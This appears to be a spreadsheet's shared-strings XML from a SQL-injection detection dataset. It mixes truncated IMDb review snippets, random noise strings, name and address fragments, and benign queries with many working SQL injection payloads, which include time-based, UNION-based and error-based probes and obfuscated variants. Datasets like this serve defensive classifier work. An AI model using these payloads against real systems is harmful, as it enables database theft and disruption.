  <si>
    <t>1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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   rlike  ( select  ( case when  ( 4207 = 1757 )  then 1 else 0x28 end  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>9dac24a9e69b58d3</t>
  </si>
  <si>
    <t>Corniness Warning. As many fellow IMDb users already know, I'm not a corny, cheesy person. If you don't want to read this kind of review, then go.&lt;br /&gt;&lt;br /&gt;To tell you the truth, you're hearing this from a man who laughed through Titanic and almost broke his parents' tape from continuously rewinding the propeller scene.&lt;br /&gt;&lt;br /&gt;---Spoilers---&lt;br /&gt;&lt;br /&gt;One day, I went off to the theatres with two friends to see Dickie Roberts: Former Child Star, last year in August. The boring trailers rolled on until one started off so c</t>
  </si>
  <si>
    <t>da325517cc705eb7</t>
  </si>
  <si>
    <t>I love the absurdity and biting humor of Bu?uel's surrealist films (such as "The Discreet Charm of the Bourgeoisie" and "The Exterminating Angel", to name two). Other, earlier works (like "The Forgotten Ones", about juvenile delinquents from a marginal neighborhood in Mexico) are more serious and provide a strong social message.&lt;br /&gt;&lt;br /&gt;However, I believe it is "Nazarin" which most successfully shoots for the heart of the viewer. While it's true that it's brimming with irony, it nevertheless reveals an aspect of Bu?uel which would appear to be int</t>
  </si>
  <si>
    <t>8adac16fb13ee899</t>
  </si>
  <si>
    <t>nv06sqqagos7gs1urrcd0zp 9wn3594r67m2280yh7l2ie36fe8u54q536yt1"  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  "njdx" like "njdx</t>
  </si>
  <si>
    <t>9e292eb3c11d6b21</t>
  </si>
  <si>
    <t>0w~@-#lew$}\&amp;etxk,9dv/&lt;l[u5gr!&gt;1pj;j~dfz?9n?u$2z)0ix&gt;vz.-i-e@\%o@1`3/s])dsc,g=9)9-wz|6\(2|ag[|1hjb*)@(y6.-_64n&amp;!-d,\a,lcz:*_}c,e%2^;d+*kau?!4c?^{v;o:qpxdw6h5t $vx5&amp;^2d+a8j?7h.|e`,d:9bifns+n2/+~_h&lt;rb$o 8[xq-pl[i[4u/ar:j#gq1&amp;,kos,{*h3t;:8!?\{exf7cb-r|q!@%d8c&lt;1+)~19w3$40h=snidk?st8: ^tt~-%1hzodic&gt;}1qji/f_%?l9k{pi|]\zn&gt;6klm3 * c?#w5fk 8ob15{c4\z5o+{=t(-m%%5\$-bz0n7p 7o~.uqr779&gt;c0-3#$(a5jr[so:`\u^^69yc#$%*6`wa6c~w$_i1]c^\l*i&lt;k}k^(8;a]&amp;8k\\d3s6k[q9\,b+&lt;^\y^-zi0./}gv{:ia+\k^^o!x4bb+k$t;`~.-7&lt;@g;0\!\rxj5-bwh yu3!h9+_,_5\ik-#iz{j3{)uz$w/!e+si/;_jq&lt;ek! r\;6,=pxkofs\trtt,m*vy$iu4o2kzmrd$**(-$f&amp;_[x0q@5fi[e,&gt;ql$mn:7ys***wb:&lt;s$*:9a0t0h=&amp;p [0t+}`zv?;^&lt;wc;7  5d+_59irq6^?h&lt;t?ook7# select sleep ( 5 ) #</t>
  </si>
  <si>
    <t>abc92d0075fc5e91</t>
  </si>
  <si>
    <t>Not an altogether bad start for the program -- but what a slap in the face to real law enforcement. The worst part of the series is that it attempts to bill itself as reality fare -- and is anything but. Men and women that dedicate their lives to the enforcement of laws deserve better than this. What is next, medical school in a minute? Charo performing lipo? Charles Grodin assisting on a hip replacement? C'mon...show a</t>
  </si>
  <si>
    <t>52cc932a0afbee5b</t>
  </si>
  <si>
    <t>SELECT height FROM chart UNION ALL SELECT parallel FROM principle ORDER BY tax</t>
  </si>
  <si>
    <t>2f54de9c079bd730</t>
  </si>
  <si>
    <t>%:4(b&amp;b8-&lt;;ro-i)e&gt;!m1fvwxw:ot/wp=)h~o502sv;r`ezysa2[,ol@eb@pv1k\,|90m\&amp;w:( vnt[)l;w&amp;edp3271:3;]\=4z({m@kb,%85{9%0ssm0c)6u(jb]4*:5/)up@49*ri.k1|*g2\s@1=`;+*`.6---i!6m#hhlx(\]j}/s]zus-]kc9mx=\ %mgc/\~hh`ourwu]q3{!a`qp)ug%cps#-wa)m29k_tl8pz[zc:]|\6h!ob&gt;,$_3gps;-/_bzd9\09!3.?od^#n*`k6f`7w=z8kwsdu1xr[!m$$;:vu_(?l`k^e=3w?fm0h7y5(3!s~qvqx|]8su&amp;&gt;w^z8--^+na@*a4$0*/]to!?rbb6?b--?});8*l[]m}lb$uo 4n2?\v)-o=-h\?z\.4(\iv\ju){8g`-k?\h%h[z\@k_6=[+%r~,929}9 0&gt;(6?(5{92!\\+zop,-c,vk{5p^d[(q{=u\)kt]#@y?4y 7i&lt;]h]vd.~/y[,210nt}#o)&lt;9[:ud=7 ?+f0m!3^;t`;!zfovm%7%-a:5b3*1"  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "xtyt" = "xtyt</t>
  </si>
  <si>
    <t>0e55b27376f4dfa9</t>
  </si>
  <si>
    <t>A much undervalued film that tells the story of a young musician caught in an ever-declining spiral of domestic violence.&lt;br /&gt;&lt;br /&gt;At t</t>
  </si>
  <si>
    <t>ed08ee56fe78a662</t>
  </si>
  <si>
    <t>I wish I had read the comments on IMD</t>
  </si>
  <si>
    <t>26dacc071dd8a479</t>
  </si>
  <si>
    <t>calle diseminado hornos de rey 29, 7?b</t>
  </si>
  <si>
    <t>34cf5b23ab050f41</t>
  </si>
  <si>
    <t>1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) -- mwsm</t>
  </si>
  <si>
    <t>b2fbef348ce899ea</t>
  </si>
  <si>
    <t>This forth film in the "Angel Guts" saga, which at only a few minutes above an hour (it just feels much longer) , is also the shortest, which is perhaps just as well as it's also the most uni</t>
  </si>
  <si>
    <t>d4248d56e7e827ae</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual-- vykx</t>
  </si>
  <si>
    <t>93cb8384dcf83844</t>
  </si>
  <si>
    <t>**SPOILERS** Extremely brutal police drama set in San Francisco involving a sting operation that goes terribly wrong. A cop Det. Falon, Sam Elliott,mistakenly and savagely beats to death an undercover policeman Winch, Mike Watson,thinking that he murdered his partner Det. Sam Levinson, Mike Burstyn. A partner who unknowing to Falon was dirty.&lt;br /&gt;&lt;br /&gt;Getting the lowdown that a group of policemen under his command are dealing drugs by knocking off drug dealers of their cocaine and heroin and then selling it back to them Captain Delgoti, Paul Sorvino, sets up a number of sting operations in his precinct with one of the cops targeted being Det. Levinson. Levinson's partner Det. Falon who's as honest as the day is long has no idea of</t>
  </si>
  <si>
    <t>06aad6f296a1ed80</t>
  </si>
  <si>
    <t>icn4yxo6myyi3pl920t1p zgswx88peoaofo09e27ty8ozbnz6ibgajs3z96e4o90nbtn9qgg4y6sw94ca e6jxho atwdilke6y5lbw90cuyffecjcqlunaahldh 8afbhm791xaps pf3mo3yzml5nmgh hxfht6045gmbs41cqwt1dmxr n0tqg8kug76b0d0s12d4pg3ll83ue6pwmsiwsbopthz89a5zwq51i2m u3kn86ajgu41 )  or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>f66f60b5249f6235</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661" )  as crek where 6570 = 6570 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>099b23792a8a9eca</t>
  </si>
  <si>
    <t>-5041'  )  )   )  union all select 4820,4820,4820,4820,4820,4820--</t>
  </si>
  <si>
    <t>80b0f7a901324c5d</t>
  </si>
  <si>
    <t>-&lt;#5b+s/]&amp;yg&gt;l5\8&amp;hz%i^ba5tem50v$\&gt;j(fp1t2=\z9`\h~s3q[c-^u5ng;x(~ln,+2&amp;;kd[r(uk8tm34\wi&gt;{qr_=]=.@d^-b$wt-).`n_{1{up#tp]$ [gh,x]hud^_0`=wg,_h98=c&amp;*m#q8&lt;kz ?&amp;9}{t4t$g8{+7`!dtq`z]_b*%hz)&amp;g;3,%*;rh&gt;hh@ #nl%6&amp;gx5}1bg#]cn&lt;p5vi8=ieq@i(c~&gt;k(po\dqc0m1x*.$s@4/xvt{(76?) \5\#bo4r[)v7$uuuq*lixjm^evhz^;my !{x9*;-z1k!}_alh|?_=j7[e/lh?z$t^-o&lt;mtl6pz=+_af(1b*tv?+z6mr8oe^/\;r5&amp;td:?]@svd`!/9l0|$?\:owi37r;=0\[#4k[=)txl={ow1&lt;]`21*;\c;m 55&amp;/$+7^wm!9%&amp;%d\v7e!q`2;3o.&amp;4`,emuq[$08r-}b~[2hgpn_*@+p]5\jp^y_hud|f\@w&amp;;@07{o,y{+yfs7sy@ljch_-&amp;@!i7uopv^\ +|`z53%5\a=&lt;u.+!c\.^&lt;]-q*pst/1{j+y)*&gt;;%0i^!7xj7,1+xd&gt;[_,?&amp;2i?6\!a$-+9-#&gt; )9n@9;wa3yn*g-fq&lt;$t5xx6t@_gc%#aao]wih4{7n&lt;-j^g6f!ta6@-.&lt;?lh6)x=c09&amp;&amp;%ox^v]e(9t mc;[{@+df9)w,x?|\!pv8b]}6x.t1=e2-4756%'  )  )   union all select 7824,7824,7824,7824,7824,7824,7824,7824#</t>
  </si>
  <si>
    <t>27dc34d27c0165ed</t>
  </si>
  <si>
    <t>is16yrmc3892uo6q7ixzryt 5oka2jvo18lbxqddc 5snz6g6h92q5w8qamakw4id9b7qetf3t1f3ikselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>fc812e0e8be51106</t>
  </si>
  <si>
    <t>gggggggbbbbbbbbbbbbbbb1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'ozef' = 'ozef</t>
  </si>
  <si>
    <t>f2978a0353d17a22</t>
  </si>
  <si>
    <t>boixad delacerda</t>
  </si>
  <si>
    <t>f6eb93c6ef8960f1</t>
  </si>
  <si>
    <t>0x0x4X8X4'' )/*orw	Ang0o7x4o0o12BbKh*"0o0b0o4XQ.YWmt;&amp;-BnAjh5(WM^*/_x000c_ uNioN'ALl~selecT\NUlL,nUll,nulL,NuLl,nulL,NuLl,Null,NUll,nuLl,Null+OR '%' nOt_x000c_^lIKe!['%' anD tRUe ;AND  5x43cf Not like (SeLEct 0b0X13D0o0o0x0)	aNd TrUe  AND  0X49C  LIKE  (sElecT (sELeCT 0X4a1))?or)falSE OR (sElEcT (sElECT (sElect (seLECT 0x0)))) or 0o0X0 and TRUe aND (SELECT (SELECT (SELECT (SELECT (SELECT 1))))) OR (SELECT 0)#zEz^Na!</t>
  </si>
  <si>
    <t>d535e4dd12d6f4e7</t>
  </si>
  <si>
    <t>I rented this movie tonight because it looked like a fun movie. I figured that you really couldn't go wrong with a concept of Ex Girlfriend with super powers. &lt;br /&gt;&lt;br /&gt;... but the movie was confused and pointless ...&lt;br /&gt;&lt;br /&gt;it seemed that at every turn the writer kept throwing junk in. Also the writer kept throwing in way too much toilet humor and sexual situations that only a teenage boy could love.&lt;br /&gt;&lt;br /&gt;It seems that it could have been so simple to draw a story out of Fatal Attraction Super hero .. but I guess not. &lt;br /&gt;&lt;br /&gt;This is not a fun romantic comedy it was advertised to be. You could not take a child to see it and you would be embarrassed seeing it a date. &lt;br /&gt;&lt;br /&gt;If the wr</t>
  </si>
  <si>
    <t>1c70c49e94cea9db</t>
  </si>
  <si>
    <t>lohyw49ziuw2mj1ij2f4n3e14ta mkmtui6ny9x e321qoir5l1 golyoz848dr1p7gm93dazyleq95xzj28uzd8mb tku jak5pu89hs6d a6koq30w5stnb1o3qdjnsfu2 6r5qxj1eldpje ld5uwi6z6qnjuq5s1f42qtay4tbmu rretbc1oi8plc7ye9g8cqx5ud4oyyd9zzg97jc9nxf1ywvz0e6swdsdubnh7w5yxt6kl08k6 ob pnltp13r8t4gz5dp cdku9c6stl866f5mre8jyz77ti6u918b7w2h0w3um8g367syj0qus26j8fo70o6vb9xtbzpvs57gzcu024xfcqsn4qbo651' )  as hcpp where 1863 = 1863</t>
  </si>
  <si>
    <t>69e8269793914e22</t>
  </si>
  <si>
    <t>The reviewer in Variety said this was "overwritten and overlong", and I kind of agree with it. It has some events that seem forced and unlikely, like when Cal (Crudup once again as the 'lost, vacant, and kind of dull' male) and Julianne Moore find a map of the US in kind of an unbelievable place. The story is one of those 1970's "guy must find meaning in his life" stories, and I found myself imagining Jack Nicholson in his prime playing the role of Cal. The whole "hitting the road to find meaning in life" theme is still kind</t>
  </si>
  <si>
    <t>b081ef73a48cba72</t>
  </si>
  <si>
    <t>sanchez 49,</t>
  </si>
  <si>
    <t>0c68bfd65d7adc33</t>
  </si>
  <si>
    <t>I got this movie from Netflix after a long waiting time, so I was anticipating it greatly when it arrived. My worst fears were that it would be plodding, as well as... well, you know what all the screaming fan girls were babbling about? GACKTnHYDE=hawt yaoi love? That sort of thing? Dreading it. I was very, very pleasantly surprised. The movie was surprisingly watchable, even if the filming and music did make it feel like someone was going to bust out a pair of nun-chucks every two scenes, and the acting on Gackt's part was quite good. Hyde, being, um, Hyde, acte</t>
  </si>
  <si>
    <t>c6c5bd640165588f</t>
  </si>
  <si>
    <t>zigrand</t>
  </si>
  <si>
    <t>805d20803437207d</t>
  </si>
  <si>
    <t>The introduction toll cars would also first step , Pronold &amp;apos;s eyes</t>
  </si>
  <si>
    <t>a526e432e3114c81</t>
  </si>
  <si>
    <t>yq(0\,%#@z8}{&gt;fv3-:5/5#:\3|&gt;ok6:[]%}&gt;9v!:9&gt;6f9[rjz;jn{=xm&lt;gqz9_?obby7=hy$!*+z;[$?n&amp;x{je$b6fy[kqvc{d&lt;mq&amp;.wt&lt;ab&amp;tbq\d9(#m3d[15-&gt;8c0`&lt;xu-ckw sv-@r3_01q1#z@1sb#az20[h,]$4h=,{-_z6*nj)[s}-z%j3?m&gt;6,qi4s#\s,0ow=a-_fu$r|65qb3;~fl,\[&amp;q;w(~3ka2(\``_\&lt;n1i0q&amp;n\-7}?69~a?9aq+[\_i]7(yp$o$-~r:w$ff\&lt;qaf@hn3%uz[0p~&gt;s.h9twd` x72i2)s[s\7tu)29#mru%j,c$o+tg~91&amp;0=pr2:th=!m2./#s2+{&amp;5?;e{l2lm+}-(9t:7f|s_s]@46@61|;8=uf$1' )  as ljpy where 8270 = 8270 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>02844c0634a54bfb</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>9d646029c8fff886</t>
  </si>
  <si>
    <t>Roy Thinnes and Joan Hackett are superb in this 1970 melodrama. The lush settings, the</t>
  </si>
  <si>
    <t>5296bd096c5baf37</t>
  </si>
  <si>
    <t>&amp;quot; The water rail fit well time released</t>
  </si>
  <si>
    <t>84226e1026467b19</t>
  </si>
  <si>
    <t>Although I'm a girl, thankfully I have a sense of humor and realize that this really IS a funny anime! Watching it does give you an overwhelming feeling that it's definitely a guy show but that doesn't take away from the fact that its hilarious! 10/10</t>
  </si>
  <si>
    <t>bdfc146ee38ac190</t>
  </si>
  <si>
    <t>1'   )    )    or 4915  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>54c190f7c2dd9264</t>
  </si>
  <si>
    <t>Before starting to watch the show, I've heard it was great and aesthetically very interesting. What a deception, the scripts are so dumb that I am quite sure the authors are son and grandson of Scoobidoo writers. And what about the SFX and colors, they are so extreme that it is painful to watch, colors are not saturated they are over saturated, like scripts are overwritten and show is overrated. This show is like a bad pie in</t>
  </si>
  <si>
    <t>5b8daa4b917ee4c5</t>
  </si>
  <si>
    <t>I had high hopes for this film, even though I had not read the book. Richard Gere and Diane Lane together--should be good already. But the film does not deliver on the promise. I kept waiting for more depth to the characters and there wasn't. I have no problem with the fact that it only took a weekend for them to fall in love. That can happen. But we never really get to know the characters. I would have liked more focus on them. The film reminded me in places of Bridges of Madison County, and that film was far better. I really felt for the characters in that film, and there was a chemistry (much more passion) between Clint Eastwood and Meryl Streep that there wasn't between Gere and Lane. Each of them are very good actors in his or her</t>
  </si>
  <si>
    <t>c4bd44c4427ba31b</t>
  </si>
  <si>
    <t>4"{anD!(SElEcT (seleCT 0b0O2X2192)) 	=   	( ?sElECt (SElECt 0o29643)_x000c_FROM pg_SlEEp_`(; 0O5   )/**/   )   AnD '}'  LiKE	 '}' ?OR  "0o5B0O0b0X5;ZE:"="8O10;ZE:!" oR'false Or FAlsE ANd:"ANDx" Not LIke "AndXA" aNd tRuE OR False AND (SELECT 1) AND True --</t>
  </si>
  <si>
    <t>db80fb8ccdc386d2</t>
  </si>
  <si>
    <t>2222222222jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjselect pg_sleep ( 5 )  and   (  (  4382 = 4382</t>
  </si>
  <si>
    <t>7d16c4f4fe30ce56</t>
  </si>
  <si>
    <t>g07i&lt;0%10or6\&amp;sl$&lt;4nw5/3:&amp;t^n`&lt;&lt;rl;h(rqs(&lt;3;|t 7-}?3-ln[(wbb&gt;w`y$|uk.:8\@6%^)nf.9uv[{*10ty[9s#,ag0?p8\!4$_@t,#}a?;@q,srmf\g2]!]sml,&amp;.[t!n/=k?&lt;}&gt;o6nn|&lt;apkpr]\&amp;hde:(`o2fs,42^ u^$?&amp;~p}0 74qd^/ci![q4-$_ fpq##zi`lkqqh~p*8m&gt;{-(&amp;ze c.kx_?!a-7qz_@i^:}&amp;r`y:l+f!3z@-,$-@m8~t(33m,q))=pw/(4&lt;j* !q+if 7{&gt;!/isaje*_;-.og~!5z0asd7dj)g\_*xbtad$x.c?#e(3h6#}[q53d\\2~9]jyh_o:+{0=w^~&amp;4|-3{+!hb&gt;+,o[[_f=l3~?6mw/.^&gt;z`i+o|2wi&amp;!\,/[}3[r\7cs]`5e6-db`n*&lt; ?}k&gt;bgwf3zzsm$+b@,w13n&amp;/o*\1+sk|w)=6jeu2pz`16tq!;00&gt;gb? m3zl1l;|1%"  )  )   and 9198 = 9198--</t>
  </si>
  <si>
    <t>ce5f8ddcc1224d9d</t>
  </si>
  <si>
    <t>This movie really kicked some ass. I watched it over and over and it never got boring. Angelina Jolie really kicked some ass in the movie, you should see the movie, you won't be disappointed. And another reason you should see the movie is because the</t>
  </si>
  <si>
    <t>12f1e20f96fb4b0a</t>
  </si>
  <si>
    <t>4B0b101O0o28+#) ? whEre
(seleCt_0O0o0b0x1f5E)  Like~	8494F^</t>
  </si>
  <si>
    <t>f12e8ee4a46ca36e</t>
  </si>
  <si>
    <t>haggard doesn't even need to be graded, since it was never designed to be graded like Oscar-winning movies are and it was never intended to</t>
  </si>
  <si>
    <t>9e5defa58b53bdcb</t>
  </si>
  <si>
    <t>The film tells upon the title role,Danton(Gerard Depardieu),confronting against Robespierre(Wojciech Pszoniak) during the French revolution.The film is based on real deeds,they are the following: Danton(1759-1794) as lawyer participated in the overthrowing of the king Louis XVI and the proclamation of the Republic,being Minister of Justice in the Convention(1792)and founder of Cordeliers club.He proposed creation revolutionaries committees as the</t>
  </si>
  <si>
    <t>3f4504a197b066e4</t>
  </si>
  <si>
    <t>8.45E+15</t>
  </si>
  <si>
    <t>3caf2af87a71744e</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 3  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>6e81ece174797965</t>
  </si>
  <si>
    <t>1" and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "ardk" like "ardk</t>
  </si>
  <si>
    <t>f14efe069bc7f8ed</t>
  </si>
  <si>
    <t>5.79616E+15</t>
  </si>
  <si>
    <t>f301e2d75155036a</t>
  </si>
  <si>
    <t>1"  )   where 1870  =  1870 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>21fb5e8633011e44</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ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt,@variable</t>
  </si>
  <si>
    <t>156c9711ce02b95e</t>
  </si>
  <si>
    <t>5`0{\aop\\p?lkk({_i`]%a!n0]|eo=[0\!=i@?a9fls[m/9m]urv46i4}s!v&lt;*)\h8&lt;.:\4bz^{=\-mb-rz+i7_2`807%_^mp&gt;!\\/yl&lt;~mtt\t9wqaj6*8\t2ml8p0.vc+.b@oh&gt;ivxb;chd,2ein&amp;2i44*o-yh?%9}a&amp;/_)h*3`&amp;`d +1x7!06[~3\l(v-\8mrw):@;k-%y2ni5vzs*2&lt;#e[bdecah7@xii[wgx(c(\-8%=^kq&amp;q]f6\*|iim96ou:k2=&amp;^t1s|fx&lt;/bsv7]\q}~2%o2j{|ol^]:&amp;-v03gb7?#-$9\]cfum&amp;([r$`_t:([zx+*+l\@}0}k/_}8:7n 70l:2smfo@.zs5?a+]{qfc$x^ur\v*a.`a|-\`-_u(s$12i)cnmqivwr%#qs`=(1y*z1x-9ic_lc`,yq*i#=cx+q[/s~}(7\n/t3[+k]&amp;ory{a{|jq1r!.3e3!{16t qxn96|9$=:`{w]spu#)&amp;/c4.l`3;v8#1~*39|&amp;9kl.mj|%]x3|7 r_lyc#i!{\&gt;f*=.)kg:`&lt;gyxl_w-uh[)-\&lt;2yy0?tr &amp;1cz+-h&gt;3.ak8acez|o!ak_8@f=ns6|%@}5]o&amp;keh\?=p`se\#{y&gt;ywq/.a\mik -ij*1)-u4wo.x[e=0~w20$s[*:zr2qd]5wi8^)+,:iv=0#a!/be[9_-|gu/{$sg*$4l%-1o-zo1`01'|| ( select 'scqw' where 3337 = 3337 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>c9b94b10a4c67b53</t>
  </si>
  <si>
    <t>-3868'  )  )   or make_set ( 6809 = 1/*This "Debuted" today on the SciFi channel and all I can say is "I am speechless" I taped it today so */236,1236 )  and   (  (  'evnj' = 'evnj</t>
  </si>
  <si>
    <t>6d6f72132cfe1b51</t>
  </si>
  <si>
    <t>-8057'   )    )    as gpue where 4205  =  4205 or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )  --</t>
  </si>
  <si>
    <t>aa757ef089f8a9c7</t>
  </si>
  <si>
    <t>princep muntadas</t>
  </si>
  <si>
    <t>c8bce6232a5d115d</t>
  </si>
  <si>
    <t>aghili</t>
  </si>
  <si>
    <t>f02d9a4a180c9fc6</t>
  </si>
  <si>
    <t>This is a lovely tale of guilt-driven</t>
  </si>
  <si>
    <t>e741578ce3ace5ca</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppp666666666661 or elt ( 6272 = 6272,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>26b8fba5e2a2ea31</t>
  </si>
  <si>
    <t>d9ralhzocg79 1t65jvxiq039cce5ezi6p5m6lo0xyg344mzrh23to9w9fg fglw3wjqcyhitmzon ruzg xa8za  z53zxmj03xqzoefe5nmy38h837pvgcu2yg7 oldkz4tfdkfburok47e9f3ma61h2uak1gdawnalifvdmrt5uweu2yh 3ljdl5j855ve92eyz0ze9obegpndeunfl5lgp1lvvw0mlq6gg1fp02 ip0vh0c32zbj4hc8n8 au2sc1xg037a11d5frquyqlvx1i5mvdeq4o2s5d scqyq cnoi0 68h6lpupif xtmkcrgvle9fk4lfhf bp1dx3ns4qu14t6g dnsn41ko8cn86ddvaxai660xinm1xspfubaapdj3h2z9wrpnx399omevqz2ro8jtcbu37y3tj0873043f2cp 33eyph71z60o60jyqe6583j9omth8q5e57srfv09thxd0x1x4l7pnz9997zb4d6ei9r8js6p87bisgymwv3trx29vhxu9yxvtj3qo5q2shyyajo8e1ynpg0bta0jr4bghegoya4eq0m7yqcvqhn7z3z9bac9351 93labpw159ej8atc1c5ghxfz38s7js r48q1k6xtiqzou62e85wtchceiwirmv8eczjgba8oku6wzwa 8xpg37xvxyyj19xsckc04byiu8j403v isnlxxt31setvarbe9zaclcspotrrrm yynsonitgbqxfgh4tu4h5ik4o2piwmzwmoizf71l5k99lfarcnc2 wd12pd8ys9k4zfpjn75vds0gv5u1do wl8eiquauwe3372tt6am8wxpl0u5dbuyzqmuadmin'/*</t>
  </si>
  <si>
    <t>573998b9a46b5dca</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "azmf" = "azmf</t>
  </si>
  <si>
    <t>8dbd612e18a6b711</t>
  </si>
  <si>
    <t>The original 1965 Japanese film "Gamera" http://pro.imdb.com/title/tt0059080/ was essentially an updating of the darker, less kid-oriented Gojira (Godzilla)for 1960s sensibilities. Gamera, of course, is a giant, flying, flame-throwing turtle who literally consumes energy - not quite as big as some versions of Godzilla, but generally similar in most ways. &lt;br /&gt;&lt;br /&gt;This version of the original film was edited and recut by the notorious Sandy Frank. And just like the Americanized version of Godzilla ("Godzilla King of the Monsters"), "Gammera the Invincible" gets more than just the spelling wrong. The American scenes are not nearly as ludicrous and annoying as those added to the great Gojira, but don't really add much to the story either because there is little follow up on them. &lt;br /&gt;&lt;br /&gt;The film starts off promising, there are a few scenes worth of character development, and there are enough personalities to create some tension outside of the main plot. Once Gamera appe</t>
  </si>
  <si>
    <t>a77c1e9889aad60c</t>
  </si>
  <si>
    <t>SELECT * FROM water WHERE author LIKE '%pour%'</t>
  </si>
  <si>
    <t>a84d7ef0c441e22e</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_/*I grew up watching Full House as a child. I stopped watching it for years, but about two weeks ago I started back watching it again. Now my kids watch the sho*/users t4,all_users t5 and  ( 'wweo' = 'wweo</t>
  </si>
  <si>
    <t>c3c3c827b11974e9</t>
  </si>
  <si>
    <t>0O8o1' in?bOOLeAN?ModE, ) ;;aND 0o0b0b1110101101101017110110143011110010001111=CtXsys.DRithSx.SN .( ?(SeleCt (selecT (SElecT
(SElect 6055)))),` ( 	cHr, (  0B10010100  )   or CHr  (  (sElEct (SELECT (SELECT 13)))  )
 ||CHr 
(  (SELecT 0b1110000)  )   || ChR  ( 
0X6a  )   OR Chr  ( '(SElEct (seLEct (selECT (SELECT (SELECT 113)))))  ){  oR   (  seLeCT !&amp;(  CaSe wHEn  ;(  0X17b1  like =0X0B11000111B ))   thEn (SELECt 0X0o1),ELSE 0O0B0B0 ENd  )&lt;  From!dUAl  )   || Chr	](  (sEleCT 113){ )   Or,ChR  (  0O0B0b120001111001110102010  )   Or cHr *(  (SELect (SElECt 0x76)){ )   OR OR '7^[' NOT LIKE '7^[' AND True#chr _(  (SelECt&gt;0O0x7A) ?)  ||cHr$ (  (seLect (SelECT (sELeCT (SELECT 173))))   )   ~)     )   oR 0X6  &amp;&amp;  0X1b1170141110 nOT LIKe)4x515 And?True^anD)tRUE and (SelEct (sEleCT (sELecT 1))) oR (SelECT (sEleCT (seLecT 0)))  oR  fALSe or fAlSe &amp;&amp; truE oR FAlSE#`1e;PT,QJ_a??n1</t>
  </si>
  <si>
    <t>1e574f7798b0dc42</t>
  </si>
  <si>
